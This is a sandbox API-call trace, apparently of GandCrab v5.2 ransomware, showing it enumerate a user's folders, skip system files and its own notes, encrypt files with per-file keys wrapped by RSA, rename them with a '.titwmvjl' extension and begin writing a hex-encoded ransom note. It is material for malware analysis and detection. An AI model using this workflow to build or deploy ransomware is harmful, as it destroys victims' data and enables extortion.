param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\d2ca4a09d2ca4deb61a.lock") returned 107 [0095.907] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\pt-rl7dzeigs9hwf4kxk\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0095.908] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.908] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.908] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\") returned 83 [0095.908] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\*" [0095.908] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503938 [0095.909] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.909] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.909] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.909] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.909] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.909] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0095.909] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0095.909] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\d2ca4a09d2ca4deb61a.lock" [0095.909] lstrlenW (lpString=".titwmvjl") returned 9 [0095.909] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\d2ca4a09d2ca4deb61a.lock") returned 107 [0095.909] VirtualAlloc (lpAddress=0x0, dwSize=0x116, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.910] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 116 [0095.910] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\d2ca4a09d2ca4deb61a.lock") returned 107 [0095.910] lstrlenW (lpString=".lock") returned 5 [0095.910] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.910] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0095.910] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.910] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.910] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.910] lstrcmpW (lpString1="KPqlCrGF.swf", lpString2=".") returned 1 [0095.910] lstrcmpW (lpString1="KPqlCrGF.swf", lpString2="..") returned 1 [0095.910] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\", lpString2="KPqlCrGF.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf" [0095.910] lstrlenW (lpString=".titwmvjl") returned 9 [0095.910] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf") returned 95 [0095.910] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.910] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf.titwmvjl") returned 104 [0095.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf") returned 95 [0095.911] lstrlenW (lpString=".swf") returned 4 [0095.911] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.911] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0095.911] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0095.911] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf") returned 95 [0095.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf") returned 95 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="desktop.ini") returned 1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="autorun.inf") returned 1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="ntuser.dat") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="iconcache.db") returned 1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="bootsect.bak") returned 1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="boot.ini") returned 1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="ntuser.dat.log") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="thumbs.db") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="CRAB-DECRYPT.html") returned 1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="ntldr") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="NTDETECT.COM") returned -1 [0095.911] lstrcmpiW (lpString1="KPqlCrGF.swf", lpString2="Bootfont.bin") returned 1 [0095.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf") returned 95 [0095.911] lstrlenW (lpString=".swf") returned 4 [0095.911] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.912] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0095.912] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.912] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.912] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\pt-rl7dzeigs9hwf4kxk\\kpqlcrgf.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0095.912] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.912] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0095.913] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.913] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.913] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.914] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.914] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.914] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0095.914] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.914] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.914] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.914] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.914] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.915] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.915] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.915] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.915] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0095.915] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.915] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.915] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.915] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.916] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.916] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033b8) returned 1 [0095.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.916] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.916] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.917] GetLastError () returned 0x0 [0095.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.917] CryptDestroyKey (hKey=0x5033b8) returned 1 [0095.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.917] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.917] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.918] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503238) returned 1 [0095.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.918] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.918] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.918] GetLastError () returned 0x0 [0095.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.918] CryptDestroyKey (hKey=0x503238) returned 1 [0095.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.918] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.919] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.919] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.919] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x2f58, lpOverlapped=0x0) returned 1 [0095.929] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffd0a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.929] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2f58, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x2f58, lpOverlapped=0x0) returned 1 [0095.930] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.930] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0095.932] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.937] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.937] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.937] CloseHandle (hObject=0x2c4) returned 1 [0095.938] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\pt-rl7dzeigs9hwf4kxk\\kpqlcrgf.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\KPqlCrGF.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\pt-rl7dzeigs9hwf4kxk\\kpqlcrgf.swf.titwmvjl"), dwFlags=0x1) returned 1 [0095.938] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.939] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.939] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0095.939] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0095.939] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\TITWMVJL-DECRYPT.txt" [0095.939] lstrlenW (lpString=".titwmvjl") returned 9 [0095.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\TITWMVJL-DECRYPT.txt") returned 103 [0095.939] VirtualAlloc (lpAddress=0x0, dwSize=0x10e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.939] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 112 [0095.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\TITWMVJL-DECRYPT.txt") returned 103 [0095.939] lstrlenW (lpString=".txt") returned 4 [0095.939] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.939] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0095.939] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0095.939] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.940] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\TITWMVJL-DECRYPT.txt") returned 103 [0095.940] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\pT-rl7dzeiGs9hwF4kXK\\TITWMVJL-DECRYPT.txt") returned 103 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0095.940] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0095.940] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.940] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0095.940] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0095.941] CloseHandle (hObject=0x2bc) returned 1 [0095.941] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.941] lstrcmpW (lpString1="QJlG0ayf3eEvs", lpString2=".") returned 1 [0095.941] lstrcmpW (lpString1="QJlG0ayf3eEvs", lpString2="..") returned 1 [0095.941] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="QJlG0ayf3eEvs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs" [0095.941] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\" [0095.941] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.941] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.942] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.942] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.942] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.942] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.942] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.943] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\\\TITWMVJL-DECRYPT.txt") returned 97 [0095.943] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0095.943] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x